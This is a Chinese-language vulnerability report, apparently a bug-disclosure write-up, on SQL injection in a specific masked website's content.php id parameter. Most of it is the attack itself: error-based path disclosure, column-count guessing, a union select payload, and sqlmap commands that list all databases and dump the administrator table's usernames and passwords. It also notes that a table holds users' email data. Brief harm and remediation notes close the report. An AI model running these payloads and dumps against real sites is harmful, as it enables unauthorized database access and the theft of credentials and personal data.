某網站純在SQl注入利用漏洞
1.單引號返回物理路徑

2.猜解當前表的列數,16列正確并正常返回,17列返回異常


3.結合union select語句,
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 --+返回3和7,并在圖片里面返回12


4.查看其數據庫名和數據庫版本:

5.使用sqlmap工具
1)爆出其所有庫
sqlmap -u "http://******.com/content.php?id=268" –dbs

2)爆出*******2_db庫的所有表
sqlmap -u "http://******.com/content.php?id=268" -D *******2_db –tables

3)爆出administrator表的所有列和數據
sqlmap -u "http://******.com/content.php?id=268" -D *******2_db -T administrator --column
sqlmap -u "http://******.com/content.php?id=268" -D *******2_db -T administrator C AddTime,AdminID,AdminName,AdminPassword,ID,isFrozen,LoginTime,UpdateTime -dump


4)再試著爆出enews表的所有列和數據

此表存在2017-2020年用戶郵箱數據等敏感信息


另:以上此網站所有表都可使用sqlmap工具得到一些數據信息,在此不一一列舉了。
總結:
漏洞可能造成的危害:
1)攻擊者未經授權可以訪問數據庫中的數據,盜取用戶的隱私以及個人信息,造成用戶的信息泄露。
2)可以對數據庫的數據進行增加或刪除操作,例如私自添加或刪除管理員賬號。
3)如果網站目錄存在寫入權限,可以寫入網頁木馬。攻擊者進而可以對網頁進行篡改,發布一些違法信息等。
4)經過提權等步驟,服務器最高權限被攻擊者獲取。攻擊者可以遠程控制服務器,安裝后門,得以修改或控制操作系統。
修復建議:
1)使用waf過濾敏感字段,例如mysql函數。
2)建議提交的url是否存在可控字段,若用戶修改參數則自動跳轉到某頁面。